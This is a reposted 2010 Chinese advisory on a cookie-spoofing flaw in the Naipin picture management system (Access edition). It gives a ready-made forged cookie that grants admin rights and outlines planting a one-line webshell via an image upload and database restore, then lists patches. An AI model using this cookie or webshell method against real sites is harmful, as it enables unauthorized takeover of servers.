耐品图片管理系统Access版Cookie欺骗漏洞

WBOY
发布: 2016-06-07 15:05:39
原创
1217 人浏览过

发布日期:2010-10.08 发布作者:redice 影响版本:20100906 Access版 官方地址:http://www.naipin.com/ 漏洞 类型:Cookie 欺骗 漏洞 描述:大概一年前我发现了《耐品 图片 管理 系统 Access版》有Cookie 欺骗 漏洞 :任意用户可以通过修改Cookie拿到 管理

发布日期:2010-10.08
发布作者:redice

影响版本:20100906 Access版
官方地址:http://www.naipin.com/

漏洞类型:Cookie欺骗
漏洞描述:大概一年前我发现了《耐品图片管理系统Access版》有Cookie欺骗漏洞:任意用户可以通过修改Cookie拿到管理员权限。


今年6月份我给耐品技术发了邮件,告知了这个漏洞,他们回复如下:

”您好,谢谢您的提醒!
祝您合家幸福安康!“

 

今天我下载了最新版(Naipin_T_20100906_acc.rar)进行了测试,发现这个漏洞仍然存在。
既然官方如此不重视,我就它放出来。


Netpic=ArticleFlag=0&UserName=redice&GroupID=1&Comment=1&Source=0&Article=1&PicFlag=0&Group=��ͨ��Ա&Vote=1&UserId=77&Self=1&View=1&Manage=0&Upload=1&ViewHide=0&Setting=1,1,1,1,1,1,1,1,1,1,1; ASPSESSIONIDCABRBATD=MDCHGDDALJGALHFHOIFLFJLL

利用上面的cookie不登录也能拿到管理员权限...


拿Webshell的一种思路:

如果数据库后缀名是asp的,可以采用该思路。上传用户图像,上传一张含有一句话木马的图片(采用edjpgcom工具)。
进入后台,使用数据库恢复功能将上传的图片恢复为数据库。

 

修复方案:临时修补办法如下:

(1)Admin_ChkLogin.asp第66行下增加如下代码:
session("GroupId")=Rs("GroupId")

(2)将clsMain.asp的第112行改为如下代码:
UserGroupId=session("GroupID")

(3)建议尽量做到:能写入的目录不给执行权限,能执行的目录不给写入权限。

 

标签分类: cookie欺骗 验证漏洞

来源:php.cn
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板